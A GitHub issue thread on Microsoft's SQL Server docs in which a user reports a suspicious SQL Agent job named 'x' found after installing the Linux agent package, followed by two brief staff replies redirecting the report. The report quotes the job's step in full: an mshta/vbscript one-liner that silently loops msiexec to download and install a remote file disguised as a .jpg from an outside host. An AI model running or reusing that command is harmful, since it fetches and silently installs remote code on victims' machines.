### ISSUE TITLE
Strange predefined job named 'x' in clear agent install

### ISSUE THREAD

**Issue by a0z9** [MicrosoftDocs/sql-docs.ru-ru#62]
Hi all.

Strange predef job named 'x' was founded on mssql agent
installed from default ms source from mssql-server-agent package..

Step 1. code seems to be malicious, but not for nix..
I copy it:
mshta vbscript:createobject("wscript.shell").run("Cmd /c for /l %i in (1,1,100) do (Msiexec /i http://op.cnazb.xyz/Sqlexec/sps.jpg /Q)",0)(window.close)

I've safety checked it,- the source 'sps.jpg' is not available now..
Host op.cnazb.xyz has US register.

 

---
#### Сведения о документе

⚠ *Не вносите правки в этот раздел. Это необходимо для связывания страницы сайта docs.microsoft.com с вопросом на GitHub.*

* ID: aeba625e-8a51-f1ce-1b74-85fa2009a3e5
* Version Independent ID: f3d5c671-a891-e015-3c19-14a3bfbc15f4
* Content: [Установка агента SQL Server в Linux - SQL Server](https://docs.microsoft.com/ru-ru/sql/linux/sql-server-linux-setup-sql-agent?view=sql-server-2017#feedback)
* Content Source: [docs/linux/sql-server-linux-setup-sql-agent.md](https://github.com/MicrosoftDocs/sql-docs.ru-ru/blob/live/docs/linux/sql-server-linux-setup-sql-agent.md)
* Product: **sql**
* Technology: **linux**
* GitHub Login: @VanMSFT
* Microsoft Alias: **vanto**

**Comment by srvbpigh** [comment]
Hello, @a0z9
 
Thank you for your feedback.
 
We are actively reviewing your comments and will get back to you soon.


Kind regards,
Microsoft DOCS International Team

**Comment by lichasu** [comment]
Hello, @a0z9 ,

Your contribution is highly appreciated. Yet, this feedback is related with product, please kindly log your suggestion by using the button "Give Product Feedback" at the bottom of the DOCS page.

If you have any feedback related to the documentation, please feel free to log it through this channel.

We truly appreciate your contribution to our articles.

Microsoft DOCS International Team
